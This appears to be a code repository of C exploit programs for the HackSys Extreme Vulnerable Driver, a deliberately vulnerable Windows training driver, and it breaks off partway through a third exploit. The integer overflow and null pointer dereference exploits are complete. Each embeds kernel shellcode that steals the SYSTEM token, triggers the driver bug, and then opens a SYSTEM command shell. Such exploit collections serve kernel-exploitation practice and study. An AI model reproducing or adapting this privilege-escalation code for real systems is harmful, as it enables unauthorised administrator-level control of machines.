├── HS-IntegerOverflow ├── HS-IntegerOverflow.sln └── HS-IntegerOverflow │ ├── HS-IntegerOverflow.c │ ├── HS-IntegerOverflow.h │ ├── HS-IntegerOverflow.vcxproj │ └── HS-IntegerOverflow.vcxproj.filters ├── HS-NullPointerDereference ├── HS-NullPointerDereference.sln └── HS-NullPointerDereference │ ├── HS-NullPointerDereference.c │ ├── HS-NullPointerDereference.h │ ├── HS-NullPointerDereference.vcxproj │ └── HS-NullPointerDereference.vcxproj.filters ├── HS-TypeConfusion ├── HS-TypeConfusion.sln └── HS-TypeConfusion │ ├── HS-TypeConfusion.c │ ├── HS-TypeConfusion.h │ ├── HS-TypeConfusion.vcxproj │ └── HS-TypeConfusion.vcxproj.filters ├── HS-UninitializedStackVariable ├── HS-UninitializedStackVariable.sln └── HS-UninitializedStackVariable │ ├── HS-UninitializedStackVariable.c │ ├── HS-UninitializedStackVariable.h │ ├── HS-UninitializedStackVariable.vcxproj │ └── HS-UninitializedStackVariable.vcxproj.filters └── README.md /HS-IntegerOverflow/HS-IntegerOverflow.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio Express 14 for Windows Desktop 4 | VisualStudioVersion = 14.0.24720.0 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "HS-IntegerOverflow", "HS-IntegerOverflow\HS-IntegerOverflow.vcxproj", "{F2510126-6583-498C-A9B1-D821264B7135}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|x64 = Debug|x64 11 | Debug|x86 = Debug|x86 12 | Release|x64 = Release|x64 13 | Release|x86 = Release|x86 14 | EndGlobalSection 15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 16 | {F2510126-6583-498C-A9B1-D821264B7135}.Debug|x64.ActiveCfg = Debug|x64 17 | {F2510126-6583-498C-A9B1-D821264B7135}.Debug|x64.Build.0 = Debug|x64 18 | {F2510126-6583-498C-A9B1-D821264B7135}.Debug|x86.ActiveCfg = Debug|Win32 19 | 
{F2510126-6583-498C-A9B1-D821264B7135}.Debug|x86.Build.0 = Debug|Win32 20 | {F2510126-6583-498C-A9B1-D821264B7135}.Release|x64.ActiveCfg = Release|x64 21 | {F2510126-6583-498C-A9B1-D821264B7135}.Release|x64.Build.0 = Release|x64 22 | {F2510126-6583-498C-A9B1-D821264B7135}.Release|x86.ActiveCfg = Release|Win32 23 | {F2510126-6583-498C-A9B1-D821264B7135}.Release|x86.Build.0 = Release|Win32 24 | EndGlobalSection 25 | GlobalSection(SolutionProperties) = preSolution 26 | HideSolutionNode = FALSE 27 | EndGlobalSection 28 | EndGlobal 29 | -------------------------------------------------------------------------------- /HS-IntegerOverflow/HS-IntegerOverflow/HS-IntegerOverflow.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include "HS-IntegerOverflow.h" 5 | 6 | 7 | BOOL IsSystem(VOID) 8 | { 9 | DWORD dwSize = 0, dwResult = 0; 10 | HANDLE hToken = NULL; 11 | PTOKEN_USER Ptoken_User; 12 | LPWSTR SID = NULL; 13 | 14 | // Open a handle to the access token for the calling process. 15 | if (!OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY, &hToken)) { 16 | return FALSE; 17 | } 18 | 19 | // Call GetTokenInformation to get the buffer size. 20 | if (!GetTokenInformation(hToken, TokenUser, NULL, dwSize, &dwSize)) { 21 | dwResult = GetLastError(); 22 | if (dwResult != ERROR_INSUFFICIENT_BUFFER) { 23 | return FALSE; 24 | } 25 | } 26 | 27 | // Allocate the buffer. 28 | Ptoken_User = (PTOKEN_USER)GlobalAlloc(GPTR, dwSize); 29 | 30 | // Call GetTokenInformation again to get the group information. 
31 | if (!GetTokenInformation(hToken, TokenUser, Ptoken_User, dwSize, &dwSize)) { 32 | return FALSE; 33 | } 34 | if (!ConvertSidToStringSidW(Ptoken_User->User.Sid, &SID)) { 35 | return FALSE; 36 | } 37 | 38 | if (_wcsicmp(L"S-1-5-18", SID) != 0) { 39 | return FALSE; 40 | } 41 | if (Ptoken_User) GlobalFree(Ptoken_User); 42 | 43 | return TRUE; 44 | } 45 | 46 | 47 | void PopShell() 48 | { 49 | STARTUPINFO si = { sizeof(STARTUPINFO) }; 50 | PROCESS_INFORMATION pi; 51 | 52 | ZeroMemory(&si, sizeof(si)); 53 | si.cb = sizeof(si); 54 | ZeroMemory(&pi, sizeof(pi)); 55 | 56 | CreateProcess(L"C:\\Windows\\System32\\cmd.exe", NULL, NULL, NULL, 0, CREATE_NEW_CONSOLE, NULL, NULL, &si, &pi); 57 | 58 | } 59 | 60 | 61 | int wmain(int argc, wchar_t* argv[]) 62 | { 63 | OSVERSIONINFOEXW osInfo; 64 | TCHAR chOSMajorMinor[8]; 65 | LPVOID lpvPayload; 66 | HANDLE hDevice; 67 | LPCWSTR lpDeviceName = L"\\\\.\\HacksysExtremeVulnerableDriver"; 68 | BOOL bResult = FALSE; 69 | 70 | CHAR ShellCode[] = "\x60" // pushad ; Save register state on the Stack 71 | "\x64\xA1\x24\x01\x00\x00" // mov eax, fs:[KTHREAD_OFFSET] ; nt!_KPCR.PcrbData.CurrentThread 72 | "\x8B\x40\x50" // mov eax, [eax + EPROCESS_OFFSET] ; nt!_KTHREAD.ApcState.Process 73 | "\x89\xC1" // mov ecx, eax (Current _EPROCESS structure) 74 | "\x8B\x98\xF8\x00\x00\x00" // mov ebx, [eax + TOKEN_OFFSET] ; nt!_EPROCESS.Token 75 | //---[Copy System PID token] 76 | "\xBA\x04\x00\x00\x00" // mov edx, 4 (SYSTEM PID) ; PID 4 -> System 77 | "\x8B\x80\xB8\x00\x00\x00" // mov eax, [eax + FLINK_OFFSET] <-| ; nt!_EPROCESS.ActiveProcessLinks.Flink 78 | "\x2D\xB8\x00\x00\x00" // sub eax, FLINK_OFFSET | 79 | "\x39\x90\xB4\x00\x00\x00" // cmp [eax + PID_OFFSET], edx | ; nt!_EPROCESS.UniqueProcessId 80 | "\x75\xED" // jnz ->| ; Loop !(PID=4) 81 | "\x8B\x90\xF8\x00\x00\x00" // mov edx, [eax + TOKEN_OFFSET] ; System nt!_EPROCESS.Token 82 | "\x89\x91\xF8\x00\x00\x00" // mov [ecx + TOKEN_OFFSET], edx ; Replace Current Process token 83 | //---[Recover] 84 | 
"\x61" // popad ; Restore register state from the Stack 85 | "\x31\xC0" // NTSTATUS -> STATUS_SUCCESS :p 86 | "\x5D" // pop ebp 87 | "\xC2\x08\x00" // ret 8 88 | ; 89 | 90 | wprintf(L" __ __ __ ____ \n"); 91 | wprintf(L" / // /__ _____/ /__ / __/_ _____ \n"); 92 | wprintf(L" / _ / _ `/ __/ '_/_\\ \\/ // (_-< \n"); 93 | wprintf(L" /_//_/\\_,_/\\__/_/\\_\\/___/\\_, /___/ \n"); 94 | wprintf(L" /___/ \n"); 95 | wprintf(L" \n"); 96 | wprintf(L" Extreme Vulnerable Driver \n"); 97 | wprintf(L" Integer Overflow \n\n"); 98 | 99 | // Get OS Version/Architecture 100 | osInfo.dwOSVersionInfoSize = sizeof(osInfo); 101 | 102 | _RtlGetVersion RtlGetVersion = (_RtlGetVersion) 103 | GetProcAddress(GetModuleHandle(L"ntdll.dll"), "RtlGetVersion"); 104 | if (RtlGetVersion == NULL) { 105 | wprintf(L" -> Unable to get Module handle!\n\n"); 106 | exit(1); 107 | } 108 | 109 | RtlGetVersion(&osInfo); 110 | 111 | swprintf_s(chOSMajorMinor, sizeof(chOSMajorMinor), L"%u.%u", osInfo.dwMajorVersion, osInfo.dwMinorVersion); 112 | 113 | if (_wcsicmp(chOSMajorMinor, L"6.1") == 0 && sizeof(LPVOID) == 4) { 114 | wprintf(L" [*] Exploit running on Windows Version: 7 or Server 2008 x86 build %u \n\n", osInfo.dwBuildNumber); 115 | } 116 | else { 117 | wprintf(L" [!] 
This exploit has only been tested on Windows 7 x86 build 7601 \n\n"); 118 | exit(1); 119 | } 120 | 121 | wprintf(L" [*] Allocating Ring0 Payload"); 122 | 123 | lpvPayload = VirtualAlloc( 124 | NULL, // Next page to commit 125 | sizeof(ShellCode), // Page size, in bytes 126 | MEM_COMMIT | MEM_RESERVE, // Allocate a committed page 127 | PAGE_EXECUTE_READWRITE); // Read/write access 128 | if (lpvPayload == NULL) 129 | { 130 | wprintf(L" -> Unable to reserve Memory!\n\n"); 131 | exit(1); 132 | } 133 | 134 | wprintf(L" -> Done!\n"); 135 | 136 | memcpy(lpvPayload, ShellCode, sizeof(ShellCode)); 137 | 138 | wprintf(L" [+] Ring0 Payload available at: 0x%p \n\n", lpvPayload); 139 | wprintf(L" [*] Trying to get a handle to the following Driver: %ls", lpDeviceName); 140 | 141 | hDevice = CreateFile(lpDeviceName, // Name of the write 142 | GENERIC_READ | GENERIC_WRITE, // Open for reading/writing 143 | FILE_SHARE_WRITE, // Allow Share 144 | NULL, // Default security 145 | OPEN_EXISTING, // Opens a file or device, only if it exists. 146 | FILE_FLAG_OVERLAPPED | FILE_ATTRIBUTE_NORMAL, // Normal file 147 | NULL); // No attr. 
template 148 | 149 | if (hDevice == INVALID_HANDLE_VALUE) 150 | { 151 | wprintf(L" -> Unable to get Driver handle!\n\n"); 152 | exit(1); 153 | } 154 | 155 | wprintf(L" -> Done!\n"); 156 | wprintf(L" [+] Our Device Handle: 0x%p \n\n", hDevice); 157 | 158 | ULONG ulTerminatorValue = 0xBAD0B0B0; 159 | PULONG pTerminatorValue = &ulTerminatorValue; 160 | 161 | CHAR *chBuffer; 162 | chBuffer = (CHAR *)malloc(2096); 163 | SecureZeroMemory(chBuffer, 2096); 164 | memcpy(chBuffer + 2088, &lpvPayload, 4); 165 | memcpy(chBuffer + 2092, pTerminatorValue, 4); 166 | 167 | wprintf(L" [*] Lets send some Bytes to our Driver"); 168 | 169 | DWORD dwSize = 0xFFFFFFFF; // Trigger Integer Overflow 170 | 171 | DWORD junk = 0; // Discard results 172 | 173 | bResult = DeviceIoControl(hDevice, // Device to be queried 174 | 0x222027, // Operation to perform 175 | chBuffer, dwSize, // Input Buffer 176 | NULL, 0, // Output Buffer 177 | &junk, // # Bytes returned 178 | (LPOVERLAPPED)NULL); // Synchronous I/O 179 | if (!bResult) { 180 | wprintf(L" -> Failed to send Data!\n\n"); 181 | CloseHandle(hDevice); 182 | exit(1); 183 | } 184 | 185 | wprintf(L" -> Done!\n\n"); 186 | 187 | BOOL isGodMode = IsSystem(); 188 | if (!isGodMode) { 189 | wprintf(L" [!] Exploit Failed :( \n\n"); 190 | CloseHandle(hDevice); 191 | exit(1); 192 | } 193 | 194 | PopShell(); 195 | wprintf(L" [!] 
Enjoy your Shell and Thank You for Flying Ring0 Airways ;) \n\n"); 196 | 197 | CloseHandle(hDevice); 198 | 199 | return (0); 200 | } 201 | -------------------------------------------------------------------------------- /HS-IntegerOverflow/HS-IntegerOverflow/HS-IntegerOverflow.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include 4 | 5 | typedef NTSTATUS(NTAPI *_RtlGetVersion)( 6 | LPOSVERSIONINFOEXW lpVersionInformation 7 | ); 8 | -------------------------------------------------------------------------------- /HS-IntegerOverflow/HS-IntegerOverflow/HS-IntegerOverflow.vcxproj: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | Debug 6 | Win32 7 | 8 | 9 | Release 10 | Win32 11 | 12 | 13 | Debug 14 | x64 15 | 16 | 17 | Release 18 | x64 19 | 20 | 21 | 22 | {F2510126-6583-498C-A9B1-D821264B7135} 23 | HSIntegerOverflow 24 | 8.1 25 | 26 | 27 | 28 | Application 29 | true 30 | v140 31 | Unicode 32 | 33 | 34 | Application 35 | false 36 | v140 37 | true 38 | Unicode 39 | 40 | 41 | Application 42 | true 43 | v140 44 | Unicode 45 | 46 | 47 | Application 48 | false 49 | v140 50 | true 51 | Unicode 52 | 53 | 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | Level3 75 | Disabled 76 | true 77 | MultiThreaded 78 | 79 | 80 | 81 | 82 | Level3 83 | Disabled 84 | true 85 | MultiThreaded 86 | 87 | 88 | 89 | 90 | Level3 91 | MaxSpeed 92 | true 93 | true 94 | true 95 | MultiThreaded 96 | 97 | 98 | true 99 | true 100 | 101 | 102 | 103 | 104 | Level3 105 | MaxSpeed 106 | true 107 | true 108 | true 109 | MultiThreaded 110 | 111 | 112 | true 113 | true 114 | 115 | 116 | 117 | 118 | 119 | 120 | 121 | 122 | 123 | 124 | 125 | -------------------------------------------------------------------------------- /HS-IntegerOverflow/HS-IntegerOverflow/HS-IntegerOverflow.vcxproj.filters: 
-------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;hm;inl;inc;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Source Files 20 | 21 | 22 | 23 | 24 | Header Files 25 | 26 | 27 | -------------------------------------------------------------------------------- /HS-NullPointerDereference/HS-NullPointerDereference.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio Express 14 for Windows Desktop 4 | VisualStudioVersion = 14.0.24720.0 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "HS-NullPointerDereference", "HS-NullPointerDereference\HS-NullPointerDereference.vcxproj", "{075C2AE4-532B-405D-98A2-0F4791B09ED0}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|x64 = Debug|x64 11 | Debug|x86 = Debug|x86 12 | Release|x64 = Release|x64 13 | Release|x86 = Release|x86 14 | EndGlobalSection 15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 16 | {075C2AE4-532B-405D-98A2-0F4791B09ED0}.Debug|x64.ActiveCfg = Debug|x64 17 | {075C2AE4-532B-405D-98A2-0F4791B09ED0}.Debug|x64.Build.0 = Debug|x64 18 | {075C2AE4-532B-405D-98A2-0F4791B09ED0}.Debug|x86.ActiveCfg = Debug|Win32 19 | {075C2AE4-532B-405D-98A2-0F4791B09ED0}.Debug|x86.Build.0 = Debug|Win32 20 | {075C2AE4-532B-405D-98A2-0F4791B09ED0}.Release|x64.ActiveCfg = Release|x64 21 | {075C2AE4-532B-405D-98A2-0F4791B09ED0}.Release|x64.Build.0 = Release|x64 22 | {075C2AE4-532B-405D-98A2-0F4791B09ED0}.Release|x86.ActiveCfg = Release|Win32 23 | 
{075C2AE4-532B-405D-98A2-0F4791B09ED0}.Release|x86.Build.0 = Release|Win32 24 | EndGlobalSection 25 | GlobalSection(SolutionProperties) = preSolution 26 | HideSolutionNode = FALSE 27 | EndGlobalSection 28 | EndGlobal 29 | -------------------------------------------------------------------------------- /HS-NullPointerDereference/HS-NullPointerDereference/HS-NullPointerDereference.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include "HS-NullPointerDereference.h" 5 | 6 | 7 | BOOL IsSystem(VOID) 8 | { 9 | DWORD dwSize = 0, dwResult = 0; 10 | HANDLE hToken = NULL; 11 | PTOKEN_USER Ptoken_User; 12 | LPWSTR SID = NULL; 13 | 14 | // Open a handle to the access token for the calling process. 15 | if (!OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY, &hToken)) { 16 | return FALSE; 17 | } 18 | 19 | // Call GetTokenInformation to get the buffer size. 20 | if (!GetTokenInformation(hToken, TokenUser, NULL, dwSize, &dwSize)) { 21 | dwResult = GetLastError(); 22 | if (dwResult != ERROR_INSUFFICIENT_BUFFER) { 23 | return FALSE; 24 | } 25 | } 26 | 27 | // Allocate the buffer. 28 | Ptoken_User = (PTOKEN_USER)GlobalAlloc(GPTR, dwSize); 29 | 30 | // Call GetTokenInformation again to get the group information. 
31 | if (!GetTokenInformation(hToken, TokenUser, Ptoken_User, dwSize, &dwSize)) { 32 | return FALSE; 33 | } 34 | if (!ConvertSidToStringSidW(Ptoken_User->User.Sid, &SID)) { 35 | return FALSE; 36 | } 37 | 38 | if (_wcsicmp(L"S-1-5-18", SID) != 0) { 39 | return FALSE; 40 | } 41 | if (Ptoken_User) GlobalFree(Ptoken_User); 42 | 43 | return TRUE; 44 | } 45 | 46 | 47 | void PopShell() 48 | { 49 | STARTUPINFO si = { sizeof(STARTUPINFO) }; 50 | PROCESS_INFORMATION pi; 51 | 52 | ZeroMemory(&si, sizeof(si)); 53 | si.cb = sizeof(si); 54 | ZeroMemory(&pi, sizeof(pi)); 55 | 56 | CreateProcess(L"C:\\Windows\\System32\\cmd.exe", NULL, NULL, NULL, 0, CREATE_NEW_CONSOLE, NULL, NULL, &si, &pi); 57 | 58 | } 59 | 60 | 61 | int wmain(int argc, wchar_t* argv[]) 62 | { 63 | OSVERSIONINFOEXW osInfo; 64 | TCHAR chOSMajorMinor[8]; 65 | LPVOID lpvPayload; 66 | HANDLE hDevice; 67 | LPCWSTR lpDeviceName = L"\\\\.\\HacksysExtremeVulnerableDriver"; 68 | BOOL bResult = FALSE; 69 | 70 | CHAR ShellCode[] = "\x60" // pushad ; Save register state on the Stack 71 | "\x64\xA1\x24\x01\x00\x00" // mov eax, fs:[KTHREAD_OFFSET] ; nt!_KPCR.PcrbData.CurrentThread 72 | "\x8B\x40\x50" // mov eax, [eax + EPROCESS_OFFSET] ; nt!_KTHREAD.ApcState.Process 73 | "\x89\xC1" // mov ecx, eax (Current _EPROCESS structure) 74 | "\x8B\x98\xF8\x00\x00\x00" // mov ebx, [eax + TOKEN_OFFSET] ; nt!_EPROCESS.Token 75 | //---[Copy System PID token] 76 | "\xBA\x04\x00\x00\x00" // mov edx, 4 (SYSTEM PID) ; PID 4 -> System 77 | "\x8B\x80\xB8\x00\x00\x00" // mov eax, [eax + FLINK_OFFSET] <-| ; nt!_EPROCESS.ActiveProcessLinks.Flink 78 | "\x2D\xB8\x00\x00\x00" // sub eax, FLINK_OFFSET | 79 | "\x39\x90\xB4\x00\x00\x00" // cmp [eax + PID_OFFSET], edx | ; nt!_EPROCESS.UniqueProcessId 80 | "\x75\xED" // jnz ->| ; Loop !(PID=4) 81 | "\x8B\x90\xF8\x00\x00\x00" // mov edx, [eax + TOKEN_OFFSET] ; System nt!_EPROCESS.Token 82 | "\x89\x91\xF8\x00\x00\x00" // mov [ecx + TOKEN_OFFSET], edx ; Replace Current Process token 83 | //---[Recover] 84 | 
"\x61" // popad ; Restore register state from the Stack 85 | "\xC3" // ret 86 | ; 87 | 88 | wprintf(L" __ __ __ ____ \n"); 89 | wprintf(L" / // /__ _____/ /__ / __/_ _____ \n"); 90 | wprintf(L" / _ / _ `/ __/ '_/_\\ \\/ // (_-< \n"); 91 | wprintf(L" /_//_/\\_,_/\\__/_/\\_\\/___/\\_, /___/ \n"); 92 | wprintf(L" /___/ \n"); 93 | wprintf(L" \n"); 94 | wprintf(L" Extreme Vulnerable Driver \n"); 95 | wprintf(L" Null Pointer Dereference \n\n"); 96 | 97 | // Get OS Version/Architecture 98 | osInfo.dwOSVersionInfoSize = sizeof(osInfo); 99 | 100 | _RtlGetVersion RtlGetVersion = (_RtlGetVersion) 101 | GetProcAddress(GetModuleHandle(L"ntdll.dll"), "RtlGetVersion"); 102 | if (RtlGetVersion == NULL) { 103 | wprintf(L" -> Unable to get Module handle!\n\n"); 104 | exit(1); 105 | } 106 | 107 | RtlGetVersion(&osInfo); 108 | 109 | swprintf_s(chOSMajorMinor, sizeof(chOSMajorMinor), L"%u.%u", osInfo.dwMajorVersion, osInfo.dwMinorVersion); 110 | 111 | if (_wcsicmp(chOSMajorMinor, L"6.1") == 0 && sizeof(LPVOID) == 4) { 112 | wprintf(L" [*] Exploit running on Windows Version: 7 or Server 2008 x86 build %u \n\n", osInfo.dwBuildNumber); 113 | } 114 | else { 115 | wprintf(L" [!] 
This exploit has only been tested on Windows 7 x86 build 7601 \n\n"); 116 | exit(1); 117 | } 118 | 119 | wprintf(L" [*] Allocating Ring0 Payload"); 120 | 121 | lpvPayload = VirtualAlloc( 122 | NULL, // Next page to commit 123 | sizeof(ShellCode), // Page size, in bytes 124 | MEM_COMMIT | MEM_RESERVE, // Allocate a committed page 125 | PAGE_EXECUTE_READWRITE); // Read/write access 126 | if (lpvPayload == NULL) 127 | { 128 | wprintf(L" -> Unable to reserve Memory!\n\n"); 129 | exit(1); 130 | } 131 | 132 | wprintf(L" -> Done!\n"); 133 | 134 | memcpy(lpvPayload, ShellCode, sizeof(ShellCode)); 135 | 136 | wprintf(L" [+] Ring0 Payload available at: 0x%p \n\n", lpvPayload); 137 | wprintf(L" [*] Allocating a NULL Page in current Process"); 138 | 139 | PVOID pBaseAddr = (PVOID)0x1; 140 | ULONG uSize = 0x1000; 141 | NTSTATUS Status; 142 | 143 | _NtAllocateVirtualMemory NtAllocateVirtualMemory = (_NtAllocateVirtualMemory) 144 | GetProcAddress(GetModuleHandle(L"ntdll.dll"), "NtAllocateVirtualMemory"); 145 | if (NtAllocateVirtualMemory == NULL) { 146 | return NULL; 147 | } 148 | 149 | Status = NtAllocateVirtualMemory(GetCurrentProcess(), &pBaseAddr, 0, &uSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); 150 | 151 | if (Status != 0) { 152 | wprintf(L" -> Unable to Allocate NULL Page!\n\n"); 153 | exit(1); 154 | } 155 | 156 | memcpy((PUCHAR)NULL + sizeof(ULONG), &lpvPayload, sizeof(LPVOID)); 157 | 158 | wprintf(L" -> Done!\n"); 159 | wprintf(L" [+] NULL_POINTER_DEREFERENCE Callback Function available at: 0x%p \n", (PUCHAR)NULL + sizeof(ULONG)); 160 | wprintf(L" [+] NULL_POINTER_DEREFERENCE Callback Function contains: 0x%p \n\n", lpvPayload); 161 | 162 | wprintf(L" [*] Trying to get a handle to the following Driver: %ls", lpDeviceName); 163 | 164 | hDevice = CreateFile(lpDeviceName, // Name of the write 165 | GENERIC_READ | GENERIC_WRITE, // Open for reading/writing 166 | FILE_SHARE_WRITE, // Allow Share 167 | NULL, // Default security 168 | OPEN_EXISTING, // Opens a file 
or device, only if it exists. 169 | FILE_FLAG_OVERLAPPED | FILE_ATTRIBUTE_NORMAL, // Normal file 170 | NULL); // No attr. template 171 | 172 | if (hDevice == INVALID_HANDLE_VALUE) 173 | { 174 | wprintf(L" -> Unable to get Driver handle!\n\n"); 175 | exit(1); 176 | } 177 | 178 | wprintf(L" -> Done!\n"); 179 | wprintf(L" [+] Our Device Handle: 0x%p \n\n", hDevice); 180 | wprintf(L" [*] Lets send some Bytes to our Driver and trigger the Null Pointer Dereference"); 181 | 182 | ULONG ulMagic = 0xB03FB03F; 183 | LPVOID lpBuffer = &ulMagic; 184 | 185 | DWORD junk = 0; // Discard results 186 | 187 | bResult = DeviceIoControl(hDevice, // Device to be queried 188 | 0x22202B, // Operation to perform 189 | lpBuffer, sizeof(lpBuffer), // Input Buffer 190 | NULL, 0, // Output Buffer 191 | &junk, // # Bytes returned 192 | (LPOVERLAPPED)NULL); // Synchronous I/O 193 | if (!bResult) { 194 | wprintf(L" -> Failed to send Data!\n\n"); 195 | CloseHandle(hDevice); 196 | exit(1); 197 | } 198 | 199 | wprintf(L" -> Done!\n\n"); 200 | 201 | BOOL isGodMode = IsSystem(); 202 | if (!isGodMode) { 203 | wprintf(L" [!] Exploit Failed :( \n\n"); 204 | CloseHandle(hDevice); 205 | exit(1); 206 | } 207 | 208 | PopShell(); 209 | wprintf(L" [!] 
Enjoy your Shell and Thank You for Flying Ring0 Airways ;) \n\n"); 210 | 211 | CloseHandle(hDevice); 212 | 213 | return (0); 214 | } 215 | -------------------------------------------------------------------------------- /HS-NullPointerDereference/HS-NullPointerDereference/HS-NullPointerDereference.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include 4 | 5 | typedef NTSTATUS(NTAPI *_RtlGetVersion)( 6 | LPOSVERSIONINFOEXW lpVersionInformation 7 | ); 8 | 9 | typedef NTSTATUS(NTAPI *_NtAllocateVirtualMemory)( 10 | HANDLE ProcessHandle, 11 | PVOID *BaseAddress, 12 | ULONG ZeroBits, 13 | PULONG RegionSize, 14 | ULONG AllocationType, 15 | ULONG Protect 16 | ); 17 | -------------------------------------------------------------------------------- /HS-NullPointerDereference/HS-NullPointerDereference/HS-NullPointerDereference.vcxproj: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | Debug 6 | Win32 7 | 8 | 9 | Release 10 | Win32 11 | 12 | 13 | Debug 14 | x64 15 | 16 | 17 | Release 18 | x64 19 | 20 | 21 | 22 | {075C2AE4-532B-405D-98A2-0F4791B09ED0} 23 | HSNullPointerDereference 24 | 8.1 25 | 26 | 27 | 28 | Application 29 | true 30 | v140 31 | Unicode 32 | 33 | 34 | Application 35 | false 36 | v140 37 | true 38 | Unicode 39 | 40 | 41 | Application 42 | true 43 | v140 44 | MultiByte 45 | 46 | 47 | Application 48 | false 49 | v140 50 | true 51 | MultiByte 52 | 53 | 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | Level3 75 | Disabled 76 | true 77 | 78 | 79 | 80 | 81 | Level3 82 | Disabled 83 | true 84 | 85 | 86 | 87 | 88 | Level3 89 | MaxSpeed 90 | true 91 | true 92 | true 93 | MultiThreaded 94 | 95 | 96 | true 97 | true 98 | 99 | 100 | 101 | 102 | Level3 103 | MaxSpeed 104 | true 105 | true 106 | true 107 | 108 | 109 | true 110 | true 111 | 112 | 113 | 114 | 115 | 116 | 117 | 118 | 119 | 120 | 121 | 122 | 
-------------------------------------------------------------------------------- /HS-NullPointerDereference/HS-NullPointerDereference/HS-NullPointerDereference.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;hm;inl;inc;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Source Files 20 | 21 | 22 | 23 | 24 | Header Files 25 | 26 | 27 | -------------------------------------------------------------------------------- /HS-TypeConfusion/HS-TypeConfusion.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio Express 14 for Windows Desktop 4 | VisualStudioVersion = 14.0.24720.0 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "HS-TypeConfusion", "HS-TypeConfusion\HS-TypeConfusion.vcxproj", "{B45D84E0-2352-4930-A4CD-786D7943A858}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|x64 = Debug|x64 11 | Debug|x86 = Debug|x86 12 | Release|x64 = Release|x64 13 | Release|x86 = Release|x86 14 | EndGlobalSection 15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 16 | {B45D84E0-2352-4930-A4CD-786D7943A858}.Debug|x64.ActiveCfg = Debug|x64 17 | {B45D84E0-2352-4930-A4CD-786D7943A858}.Debug|x64.Build.0 = Debug|x64 18 | {B45D84E0-2352-4930-A4CD-786D7943A858}.Debug|x86.ActiveCfg = Debug|Win32 19 | {B45D84E0-2352-4930-A4CD-786D7943A858}.Debug|x86.Build.0 = Debug|Win32 20 | {B45D84E0-2352-4930-A4CD-786D7943A858}.Release|x64.ActiveCfg = Release|x64 21 | {B45D84E0-2352-4930-A4CD-786D7943A858}.Release|x64.Build.0 = 
Release|x64 22 | {B45D84E0-2352-4930-A4CD-786D7943A858}.Release|x86.ActiveCfg = Release|Win32 23 | {B45D84E0-2352-4930-A4CD-786D7943A858}.Release|x86.Build.0 = Release|Win32 24 | EndGlobalSection 25 | GlobalSection(SolutionProperties) = preSolution 26 | HideSolutionNode = FALSE 27 | EndGlobalSection 28 | EndGlobal 29 | -------------------------------------------------------------------------------- /HS-TypeConfusion/HS-TypeConfusion/HS-TypeConfusion.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include "HS-TypeConfusion.h" 5 | 6 | 7 | BOOL IsSystem(VOID) 8 | { 9 | DWORD dwSize = 0, dwResult = 0; 10 | HANDLE hToken = NULL; 11 | PTOKEN_USER Ptoken_User; 12 | LPWSTR SID = NULL; 13 | 14 | // Open a handle to the access token for the calling process. 15 | if (!OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY, &hToken)) { 16 | return FALSE; 17 | } 18 | 19 | // Call GetTokenInformation to get the buffer size. 20 | if (!GetTokenInformation(hToken, TokenUser, NULL, dwSize, &dwSize)) { 21 | dwResult = GetLastError(); 22 | if (dwResult != ERROR_INSUFFICIENT_BUFFER) { 23 | return FALSE; 24 | } 25 | } 26 | 27 | // Allocate the buffer. 28 | 